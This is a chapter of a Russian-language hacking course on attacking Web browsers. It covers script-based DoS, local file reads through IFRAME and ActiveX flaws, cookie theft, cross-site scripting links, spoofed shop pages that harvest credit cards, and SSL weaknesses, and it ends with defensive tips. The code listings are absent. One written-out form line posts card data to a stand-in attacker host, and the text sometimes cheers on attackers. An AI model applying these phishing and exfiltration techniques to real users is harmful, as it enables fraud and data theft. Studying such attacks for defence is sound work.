Моя визитка Урок 1. Хакинг Урок 2. Антихакинг Урок 3. Инструменты хакинга Урок 4. Защита Windows 2000/XP Урок 5. Проникновение в систему Урок 6. Реализация цели вторжения Урок 7. Сокрытие следов Урок 8. Хакинг браузеров Web Урок 9. Хакинг почтовых клиентов Урок 10. Деструкция почтового клиента Урок 11. Хакинг Web-сайтов Урок 12. Атаки DoS Урок 13. Хакинг компьютеров Windows 2000/XP Урок 14. Хакинг средств удаленного управления Урок 15. Хакинг брандмауэров Урок 16. Перехват сетевых данных Урок 17. Хакинг коммутируемого доступа Приложение А Приложение В Приложение С Приложение D Приложение E |
Часть 3. Xaкuнг клиентов Интернет-сервисовXaкuнг браузеров Web Злонамеренный код HTMLЗлонамеренные аплеты и сценарии Безопасные для сценариев элементы ActiveX Файлы куки Перекрестные сценарии Подмена Web-сайтов Хакинг SSL Методы социальной инженерии Заключение Дo сих пор, расписывая деяния хакеров в виртуальном компьютерном мире, мы ограничивались автономным компьютером, предполагая, что у хакера имеется локальный доступ к консоли компьютерной системы. Однако, как вы сами понимаете, огромный виртуальный мир Интернета никак не может быть оставлен без внимания хакеров, поскольку в этом мире имеется очень много полезных ресурсов и личностей, готовых с ними расстаться, причем безвозмездно. Более того, именно после возникновения в середине 90-х годов прошлого столетия общедоступной сети Интернет, хакинг приобрел настоящую силу и мощь. Путешествуя по серверам Интернета, хакер может с помощью своего компьютера проникать во все уголки этого пространства, преследуя при этом свои цели. В наших уроках мы займемся обсуждением этих возможностей, а сейчас сделаем несколько замечаний, уточняющих терминологию, используемую далее при описании средств хакинга в Интернете. Итак, Интернет представляет собой объединение множества сетей, состоящих из серверов и клиентов, взаимодействующих согласно стеку протоколов TCP/IP. Клиенты - это прикладные программы, предназначенные для установления соединения с компьютерами сети с целью получения нужной информации. Серверы - это прикладные программы, которые предназначены для установления связи с клиентами, получения от клиентов запросов и отправки ответов. Обычно серверы функционируют на мощных компьютерах, соединенных друг с другом магистральными линиями связи с большой пропускной способностью. Клиенты функционируют, как правило, на сравнительно менее мощных компьютерах, подсоединенных к серверам с помощью значительно менее быстродействующих линий связи (например, телефонных линий). Серверы управляют доступом к информационным ресурсам Интернета, руководствуясь запросами клиентов. Этими ресурсами может быть любой объект, содержащий информацию, например, файл базы данных, документ Word и т.д., или любая служба, позволяющая, например, звонить по телефону или выполнять финансовые операции через Интернет. Основные ресурсы Интернета содержатся в сети WWW (World Wide Web - Всемирная паутина), или просто Web (Паутина). Сеть Web - это одно из прикладных применений сети Интернет, хотя очень многие люди считают термины Интернет и Web синонимами. Однако это не так - если возникновение сети Интернет можно отнести к 1961 году, то сеть Web возникла в 1992 году и ее развитие связано с появлением гипертекстовых информационных систем. Гипертекстовые информационные системы отличаются тем, что позволяют обращаться к хранимому в них гипертексту в произвольном порядке, определяемом гиперссылками. Именно так и организована сеть Web - множество страничек Web представляет собой гипертекст, содержащий множество гиперссылок на информационные ресурсы, хранимые на серверах сети Web. Сеть Web функционирует с опорой на следующие технические средства. • Единую систему наименований ресурсов Web, делающую возможным их поиск по серверам Web и основанную на так называемых адресах URL (Uniform Resource Locator - Унифицированный указатель информационного ресурса), определяемых протоколом доступа к серверам Web. • Протокол организации сетевого доступа к именованным сетевым ресурсам, в качестве которого в Web выступает протокол HTTP (Hyper Text Transfer Protocol - Протокол передачи гипертекстовых файлов). • Гипертекст, облегчающий навигацию по ресурсам Web, для создания которых используется язык HTML (Hyper Text Markup Language - Язык разметки гипертекста). Все указанные средства Web интересны для хакеров прежде всего тем, что недостатки системы защиты серверов и клиентов, обслуживающих функционирование Web, позволяют им выполнять некоторые весьма интересные трюки, результатом которых может быть что угодно - потеря денег на счетах, утрата работоспособности компьютера, раскрытие конфиденциальности разного рода документов - в первых уроках мы привели несколько сообщений из Web о последних «достижениях» в этой области. Рассмотрим некоторые из приемов хакинга в Web и начнем, естественно, с основы основ сети Web - языка HTML и клиентов Web, называемых браузерами (от английского слова browser, дословно означающего «человек, перелистывающий книги» или «животное, объедающее побеги»), которые отображают пользователям Web содержимое Web-страниц. Злонамеренный код HTML Язык HTML - это средство создания страниц Web, основная функция которого состоит в форматировании текстового содержимого страницы Web, вставки в текст графики, мультимедийной информации, например, звука, различных интерактивных элементов, таких как списки, кнопки и, наконец, сценариев. Таким образом, с помощью языка HTML обычный текстовый документ можно превратить в настоящую программу, которая исполняется браузерами Web, чаще всего, Internet Explorer (IЕ) и Netscape Navigator (NN). Хакер рассуждает таким образом: раз страничка Web - это программа, то почему бы не заставить код HTML странички Web делать то, что нужно мне, а не то, для чего язык HTML, собственно, предназначен - воспроизведения информационных ресурсов на серверах Web? Тогда первый вопрос - что может сделать этот код HTML? Небольшие исследования в этом направлении показывают - что очень многое. Ниже перечислены некоторые (далеко не все) из хакерских штучек, которые могут заставить поволноваться пользователя, путешествующего по Интернету с помощью Web-браузера. Генерация диалоговПо сути, это атака DoS на компьютер клиента Интернета, выполняемая включением в страничку Web простейших сценариев. Эти сценарии могут, скажем, бесконечно генерировать все новые и новые странички Web, которые браузер будет отображать на экране, пока не переполнит память компьютера. Проще всего эту атаку можно выполнить с помощью команды ореn(), которая в бесконечном цикле сценария JavaScript в страничке MainPage.html отображает эту же страничку до переполнения памяти, как это сделано в коде HTML Листинга 8.1. Листинг 1. Код HTML для бесконечного генерирования диалогов Web-странички Воспроизведение такого кода браузерами IE 5 и IE 6 приведет к стопроцентной загрузке процессора и заполнению экрана пустыми диалогами. Прежде, чем повторить этот и последующие эксперименты с кодом HTML, то предварительно закройте все приложения и запустите диспетчера задач, чтобы вовремя прекратить открытие все новых и новых диалогов. Хотя системы Windows 2000/XP с браузерами IE 5 и IE 6 устойчивы к ошибкам в кодах HTML, лучше подстраховаться. Переполнение памяти В других злонамеренных сценариях выполняют еще более простой трюк - записывают переменную с очень длинным идентификатором. Например, в Листинге 2 идентификатор XXXXXX...XXXXXX содержит несколько тысяч символов X (здесь они не воспроизведены для экономии места). Листинг 2. Код HTML переполнения памяти в сценарии Web-страницы Результатом воспроизведения кода HTML из Листинга 2 браузером IE версий 5 и 6 будет отображение сообщения об ошибке в строке оператора декларирования переменной var p из Листинга 2. Список подобного рода «сценариев» и проделываемых с их помощью "трюков" воистину безграничен. Мы, однако, не будем на них останавливаться и рассмотрим более сложный пример - запуск из кода HTML программ на клиентском компьютере. Запуск программ Теперь рассмотрим метод запуска любых локальных программ с помощью кода HTML, содержащего тег <OBJECT> с ненулевым значением идентификатора CLSID. В Листинге 3 представлен код HTML, реализующий указанную возможность. Листинг 3. Запуск локальных программ из кода HTML При загрузке кода из Листинга 3 в браузер IE 6 отображается окно браузера, представленное на Рис. 1. Рис. 1. Запуск программы калькулятора из кода HTML
В данном случае была запущена программа Калькулятор из папки C:\Windows\system32\calc.exe, однако ничего не мешает злоумышленнику запустить подобным образом программу форматирования дисков локального компьютера, расположенную в том же каталоге. Тег IFRAME Система защиты Web-браузеров построена таким образом, чтобы сценарии JavaScript, помещаемые в HTML-код Web-страниц, не имели доступа к локальной файловой системе компьютера. Однако и здесь имеется лазейка, связанная с тегом IFRAME, предназначенном для внедрения в текст Web-страницы небольших фреймов. В Листинге 4 представлен код HTML, позволяющий сценарию прочесть файл, хранящийся в корневом каталоге клиентского компьютера C:\security.txt. Листинг 4. Открытие локальных файлов из сценария Web-странички Загрузка кода из Листинга 4 в браузерах IE 5 и IE 6 приводит к отображению окна браузера, представленного на Рис. 2.
Как видно из Рис. 2, содержимое файла security.txt - строка Это очень большой секрет - отобразилось во фрейме внутри Web-странички. Таким образом, получив доступ к локальной файловой системе, можно подумать и о дальнейшей работе с ее ресурсами - и учтите, что сценарии JavaScript позволяют выполнять отправку электронных писем по указанному адресу. Данная уязвимость Web-браузеров связана с ошибками в реализации события NavigateComplete2, которое сообщает о завершении перемещения документа на новое место. Злонамеренные аплеты и сценарии Элементы ActiveX представляют собой небольшие программы, включаемые в HTML-код Web-страницы для придания ей интерактивных возможностей. При загрузке браузером Web-страницы программа, реализующая элемент ActiveX, запускается и выполняет свои функции. Ясно, что для хакера нет лучшей возможности для проникновения в компьютер Web-путешественника, чем загрузка браузером хакерского ActiveX, поскольку программный код ActiveX имеет те же права доступа к информационным ресурсам, что и учетная запись пользователя браузера. Для защиты клиентов Интернета от такой угрозы создатель технологии ActiveX - компания Microsoft - включила в механизм обработки элементов ActiveX проверку цифровых сертификатов, которые присваиваются каждому официально зарегистрированному элементу ActiveX уполномоченными организациями (например, Verisign Corporation). И если параметры безопасности Web-браузера настроены корректно, то автоматический запуск не сертифицированных элементов ActiveX будет исключен - как минимум, пользователю будет отображаться сообщение о загрузке потенциально опасного элемента ActiveX. Теоретически, такой механизм обеспечения безопасности выглядит безупречно, однако, как показывают исследования, проводимые отдельными специалистами в области компьютерной безопасности (интересные результаты можно найти на сайте http://www.guninski.com), на практике все обстоит далеко не так гладко. Причина тому - ошибки реализации и беспечность пользователей, которые часто не обращают внимания на мелькающие сообщения о загрузке не сертифицированных ActiveX и соглашаются на их загрузку, не думая о последствиях. С элементами ActiveX связаны многие возможности хакинга клиентов Интернета, и множество примеров можно найти на сайте http://www.guninski.com. Обсудим некоторые из этих возможностей, отобрав их по принципу полезности для достижения желанной цели - доступу к информационным ресурсам компьютера. Безопасные для сценариев элементы ActiveX Во время работы система Windows активно использует множество элементов ActiveX. Когда в странице Web, загруженной с Web-сайта, встречается тег <ОВJЕСТ> со ссылкой на элемент ActiveX, браузер ищет в системе Windows требуемый элемент ActiveX и далее либо использует для воспроизведения страницы найденный элемент ActiveX, либо загружает его из указанного места в Web. При этом выполняется, как указано выше, проверка цифрового сертификата элемента ActiveX. И вот тут-то и возникает некоторая проблема. Часть элементов ActiveX системы Windows имеет установленный параметр safe for scripting (безопасные для сценариев), что отменяет проверку их сертификатов при загрузке из Web. И вот, исследуя некоторые элементы ActiveX, помеченные как безопасные для сценариев, известный специалист Георгий Гунинск (Georgi Guninski) нашел следующую уязвимость. Оказалось, что некоторые таких ActiveX, а именно, элементы Scriptlet и Eyedog, имеют изъян реализации позволяющий нарушить систему защиты браузера IE 4. Для демонстрации этой уязвимости на сайте http://www.guninski.com был предложен HTML-код эксплойта (эксплойт - код, использующий ту или иную брешь в системе безопасности иллюстрирующего возможности элемента Scriptlet по записи и редактированию файлов на локальном компьютере, и элемента Eyedog по извлечению системного реестра Windows различных данных. Все эти возможности реализовывались для браузера IE 4 на системах Windows 9x. В системах Windows 2000/XP также имеются свои элементы ActiveX, отмеченные как безопасные для сценариев, и угроза их использования для взлома системы защиты браузеров IE 5 и IE 6 остается актуальной. Таким образом, на каждом компьютере Windows 2000/XP потенциально находятся, так сказать, «спяшие троянские кони», только и ждущие своего хозяина. От мыслей по поводу появляющихся при этом возможностей просто «захватывает дух» - ведь среди якобы безопасных ActiveX могут находиться элементы с весьма обширными функциями. Так что, надо думать, появление мощных инструментов хакинга, опирающихся на описанную выше уязвимость, не за горами. В Листинге 8.5 содержится код HTML, использующий недостатки реализаи двух функций браузера IЕ, выполняющих проверку принадлежности в доме для чтения локального файла. (Этот код HTML разработан Георгием Гунинским и его, как и множество других примеров, можно найти на caf http://www.guninski.com). Листинг 5. Открытие локальных файлов из сценария Загрузка кода из Листинга 5 в браузер IE 6 приводит к отображению страницы представленной на Рис. 3. Рис. 8.3. На странице содержится текст локального файла security.txt Как видим, содержимое файла security.txt стало доступным для сценария и, стало быть сценарий может передать содержимое файла security.txt на Web-сервер, с которого была загружена эта страничка, или передать содержимое файла по любому другому адресу Интернета. Так что, зная расположение важных файлов Windows, можно попробовать извлечь их содержимое, помещая на сайтах Интернета такого рода странички и сценарии сбора извлеченных данных. Польза от таких действий несомненна - ведь эти файлы могут содержать многое. Например, очень много могут рассказать файлы куки (cookie), сохраняемые Web-браузерами для связи с различными ресурсами Web. Файлы kyku Файлы куки - это настоящее золотое дно для понимающих в этом толк хакеров. В файлах куки может сохраняться все - пароли доступа к платным ресурсам Интернета, фамилии и имена пользователей, телефоны, адреса, и так далее и тому подобное - короче говоря, в них фиксируется все результаты пребывания пользователя в наиболее интересных местах Web. Получив в свое распоряжение файлы куки, хакер наконец-то добирается до всего того, что зовется этим сладким словом «халява». Чтобы получить файлы куки, хакер может прибегнуть к снифингу, прослушивая локальную сеть с помощью программы, подобной SpyNet (об этом далее), или воспользоваться недостатками системы защиты Web-браузера, которые позволяют обратиться к локальным файлам компьютера. Для иллюстрации такой возможности организация PEACEFIRE на странице своего сайта http://www.peacefire.org/security/iecookies предлагает код JavaScript, отображающий содержимое файлов куки сайта, адрес которого пользователь должен ввести в поле формы, представленной на Рис. 4. Рис. 4. Щелчок на кнопке формы отображает содержимое файлов
куки указанного сайта
Вы сами можете испытать прочность своего браузера к такой атаке. Суть её в том, что раз браузеру удалось прочесть файл куки для указанного Web-caйта с помощью сценария в загруженной страничке, то уж передать содержимое куки по назначению - дело техники. Для этого в сценарий Javascript следует включить операцию передачи сообщений по электронной почте, прямо на хакерский почтовый адрес. Ясно, что этим создается угроза раскрытия конфиденциальности куки, а ведь в них может содержаться очень много «вкусных» данных. Технология такой атаки весьма проста, и описывается на этой же Web-страничке по адресу http://www.peacefire.org/security/iecookies. Включив в сценарий Javascript, обрабатывающий событие щелчка на кнопке Click to view cookie (Щелкните для просмотра куки), некорректный адрес ссылки на сайт, рассылающий файлы куки, можно заставить браузер «выболтать» содержимое куки кому угодно. К сожалению, такая технология взлома срабатывает не всегда успех ее применения зависит от версии и типа браузера, а также настроек системы защиты. Перекрёстные сценарии Кроме помещения сценария непосредственно в HTML-страницу, хакер может применить сервер Web, генерирующий Web-странички в ответ на запросы пользователя. Для этого на сервер Web следует поместить CGI-сценарий, который после щелчка на ссылке в Web-странице, перешлет ему злонамеренный код. Пример такой ссылки представлен в Листинге 6. Листинг 6. Отправка самому себе злонамеренного кода HTML После щелчка мышью на ссылке на Web-сервер будет передан параметр Comment, значение которого, как видно из листинга, представляет собой код сценария. Такую ссылку можно поместить где угодно, в том числе, в электронную почту, сообщения ICQ, на доску объявления и так далее - в общем, в любое «безобидное» место. Щелчок же на ссылке загружает в браузер хакерский сценарий с сервера Web, попавшего в лапы какого-либо «кул хацкера». Проблема только в поиске сервера, па который можно поместить такой сценарий. (Про CGI-сценарии вы можете прочитать в Приложении В этой книги). Рис. 5. Ссылка на сайт хакера
Подмена Web-caйтoв Все описанные выше атаки могут сильно испортить нервы беспечного Web-путешественника, но, как правило, дело только этим и ограничивается - реальный вред с помощью загруженных с Web-страницей враждебных аплетов и сценариев нанести достаточно сложно. Подобные атаки практически не опасны, если защита Web-браузера настроена на блокирование не сертифицированных элементе ActiveX, и не выполняет в автоматическом режиме загруженные сценарии. Однако имеется другая разновидность хакинга, основанная исключительно на мошенничестве, и ориентированная на извлечение финансовых средств у всех тех личностей, которые, стремясь идти в ногу со временем, обзаводятся кредитными карточками, счетами в Интернет-банках, используя их для покупок в Интернет-магазинах и т.д. При этом мало кто из счастливых обладателей Интернет-карточек представляет, как работает механизм, обслуживающий их покупки. Многие вообще не интересуются, как будут использоваться владельцами виртуального магазина переданные им совершенно конфиденциальные данные - номер и другие платежные реквизиты кредитной карточки. Все это - сущий клад для хакера, поскольку все что нужно сделать для обмана покупателей - это создать Web-сайт, копирующий внешний вид электронного магазина известной фирмы. Далее, распространив ссылки на этот сайт по всему Интернету, хакер может без проблем продавать виртуальный воздух и снимать деньги со счетов доверчивых посетителей. Другая возможность, которую открывает для хакеров фальсификация Web-страниц - предоставление возможностей для загрузки злонамеренных програми. Например, вместо загрузки нового пакета обновления системы Windows с Web-сайта Microsoft вы можете загрузить и запустить троянского коня наподобие уже упоминавшейся программы NetBus. Сейчас мы опишем технику фальсификации Web-сайта, имитирующего виртуальный «Шоп» по продаже «виртуального воздуха» всем богатеньким и тупым «ламерам». Эта техника достаточно проста и заключается в помещении Web-странице злоумышленника ссылки на сценарий, генерирующий прямо на компьютере пользователя фальсифицированный ресурс. В Листинге 7. приведен пример кода HTML, реализующего фальсифицированный Интернет магазин. Листинг 7. Пример фальсификации документа HTML При загрузке кода из листинга 7 браузер IE 5 отобразит страницу, представленную на Рис. 6. Рис. 6. Web-страница компании Rog&Kopito
обратите внимание на отображаемый в строке состояния адрес ссылки - http://www.Bubliki&Baranki.com и на текст заголовка окна браузера - Фирма Rog&Kopito предлагает. Посетитель Web-сайта компании Rog&Kopito может заинтересоваться новым программным продуктом известной компании Bubliki&Baranki, но покупка программы с Web-сайта компании Rog&Kopito может вызвать у него смутные подозрения. (Надеюсь, вы понимаете, что названия компаний здесь и в последующих уроках не имеют отношение к реальным Фирмам и придуманы только для иллюстрации.) Поэтому посетителю предоставляется ссылка, якобы приглашающая его перейти на Web-сайт компании Bubliki&Baranki. После щелчка мышью на ссылке встроенный в страничку сценарий отображает фальсифицированную Web-страничку, представленную на Рис. 7. Рис. 7. Web-страничка заказа продукта VirtualAir от компании
Bubliki&Baranki
Фальсифицированная Web-страничка на Рис. 8.6 предлагает посетителю ввести свои идентификационные данные вместе с номером кредитной карточки для оплаты покупки по Интернету. Щелчок на кнопке Отправить отсылает эти очень вкусные данные CGI-сценарию GetCardNumber, как это видно из тега формы сценарии Web-странички, помещенной на сервере компании Rog&Kopito: <FORM ACTION='http://www.AnyHackerSite.com/cgi/GetCardNumber'METHOD=post> Если пользователь не обратит внимания на мелкую деталь - строку Адрес (Address) с несколько странным содержимым, он может и не заметить подмены реального магазина фальсифицированным «Шопом», в результате которой номер его кредитной карточки перекочует в базу данных злоумышленников со всеми, как говорится, вытекающими последствиями. В старых версиях браузера IE можно было без проблем манипулировать строкой Address из сценария Javascript. Хакеры легко скрывали содержимое этой строки ложным адресом URL Для иллюстрации кода HTML здесь был использован браузер IE который весьма затрудняет подобные действия, более того, IE 6 предупреждает о наличии в коде HTML средств для манипулировании отображаемыми данными. Так что будьте начеку! Другой, не менее интересный способ перехвата конфиденциальных данных которыми обменивается Web-браузер с сервером - это снифинг сетевых соединений. Перехватывая передаваемые по сети пакеты с номерами кредитных карточек, паролями и прочими интересными сведениями, хакеры могут достичь очень многого, о чем мы еще расскажем далее в этих уроках. Пока же займемся следующим вопросом - как же уберечься от такой напасти. Для этого существуют средства криптографической защиты, а именно, протокол SSL (а также менее распространенный TSL) и сертификаты владельцев Web-серверов. Xaкuнг SSL Протокол SSL (Secure Sockets Layer - протокол защищенных сокетов) преднозначается для шифрования потока данных, передаваемых между сервером клиентом Web. Для этого перед началом сетевого взаимодействия создается сокет, т.е. соединение, имеющее особые свойства - передаваемые через некие данные шифруются на основе цифровых сертификатов, предъявляемых сервером браузеру. При создании такого сокета в строке состояния браузера IE отображается замочек, а адрес сайта, поддерживающего протокол SSL, взамен строки http:// отображает строку https://. Предъявленный сервером сертификат проверяется браузером Web, и если давшая сертификат организация содержится в списке доверенных организации браузера, работа продолжается. Иначе отображается сообщение о предъявлении известного браузеру сертификата, и пользователь должен сам решить - продолжать работу или нет. Если сертификат будет принят, то с помощью специальных алгоритмов происходит шифрование/дешифрование потока данных между сервером и клиентом. Самое главное для обычного пользователя - усвоить следующий факт: подлинный Интернет-магазин не бывает без сертификата от доверяемой браузером Web организации. Во-первых, следите, чтобы ВСЕ обмены конфиденциальной информацией, например, платежными реквизитами со специально отведенной для расчетов Web-страницей выполнялись исключительно по SSL-сокету. К призеру, при отображении странички, на которой вы должны указать платежные реквизиты, в строке состояния браузера должен появиться замочек. Во-вторых, следует использовать браузер Web, поддерживающий стойкое шифрование 28-разрядным ключом. Последние версии IE предоставляют такую возможность по умолчанию, но вот старые экспортные варианты браузера IE предлагали только 56-разрядное цифрование, что совершенно непригодно для обеспечения защиты соединений с Web-серверами. Вы можете задать вопрос - насколько такие методы надежны? Ответ таков: относительно надежны. Жизнь не стоит на месте, и даже использующие защищенные протоколы сайты отнюдь не гарантированы от хакинга наиболее сообразительными и квалифицированными хакерами. Обман SSL, основанный на следующей уязвимости в системе защиты браузера IE 4: при переходе к защищенному протоколом SSL сайту по ссылке на рисунках и фреймах браузер не проверяет имя сервера и срок годности сертификата ограничиваясь только установлением факта наличия сертификата. Далее, проверив сертификат один раз, браузер IE, если не установить специальный параметр конфигурации IE, повторно сертификат сервера не проверяет. Таким образом, хакерам открываются некоторые возможности подмены сервера. Методы социальной инженерии Познакомившись с методами хакинга клиентов Интернета, вы, наверное, сами поняли, что во время путешествий по Web ухо следует держать востро. Недостатки реализации программного обеспечения и некорректная настройка параметров системы защиты браузера позволяют хакеру вытворять прямо чудеса. Однако наиболее эффективным методом, очевидно, следует считать элементарное мошенничество, основанное на доверчивости и неопытности Web-путешественников. В предыдущем разделе показано, как легко создать собственный вариант Web- магазина известной фирмы и начать продавать там виртуальный воздух в обмен на реальные деньги. Этим возможности хакера отнюдь не ограничиваются. Предложения «бесплатно» загрузить «чудо-программу», согласиться на загрузку странички с аплетом без сертификата от доверенного провайдера, щелкнуть на ссылке и просмотреть «глобальные» возможности различных сайтов - все сразу же окружает пользователя, появившегося на сайте Интернета с тщательно обезличенным авторством, но очень конкретными целями. Вот что из это может получиться. Загрузив и запустив без всякой проверки распаковку файла программы, вы можете элементарно очистить свой жесткий диск, установить в компьютер трояна или заразить компьютер вирусом. Как это делается для компьютеров Windows 2000/XP, мы обсудим далее. А поддавшись на уговоры купить что-либо на Web-сайте, вы можете подвернуться атаке кардвра - так называ хакеров, собирающих номера кредитных карточек у доверчивых простаков. Основные средства защиты от всех этих напастей таковы: • Никому не доверять. Все сайты, предлагающие платные услуги, должны иметь сертификат от надежного поставщика и обеспечивать защищенные соединения по протоколу SSL. • Регулярно обновлять Web-браузер и поддерживать настройки его системы защиты на должном уровне. • Использовать антивирусы. Всего этого может оказаться недостаточно, если вы столкнетесь с настоящим хакером, который владеет более серьезными приемами хакинга, чем описанные в этом уроке. Однако для большинства случаев годятся и перечисленные выше меры. В следующем уроке мы углубимся в более изощренные методы хакинга, связанные с электронной почтой. Оказывается, что ныне можно получить такое письмецо, что от вас не потребуется вообще ничего, чтобы стать виртуальным рабом некоего умельца, специализирующегося на комбинации кодов почтовых посланий. Этими комбинациями мы и займемся. Заключение Клиент Web - это весьма притягательный для хакера объект. Ныне виртуалы киберпространство можно сравнить разве что с территорией, на которой идет -непрерывное сражение за выживание. Чтобы победить в этом сражении, антикеру следует уметь защищаться, например, настраивать параметры системы защиты браузера и работать с антивирусными пакетами, проверяющими загружаемые из Web сценарии и аплеты. Однако все это вам не поможет, если помнить все время одну простую истину - будучи в Web не доверят НИКОМУ, НИЧЕМУ, НИГДЕ и НИКОГДА - и, быть может, обойдется. Хакеру же следует учесть, что жизнь не стоит на месте и то, что вполне толково работало в версии 4 браузера IE и Netscape, ныне, в версиях 5 и 6 уже не фнункционирует. Стало быть следует все время заботиться о совершенствован своих умений, помня при этом, что другим людям ваши делишки могут и понравиться. |
||||||||||||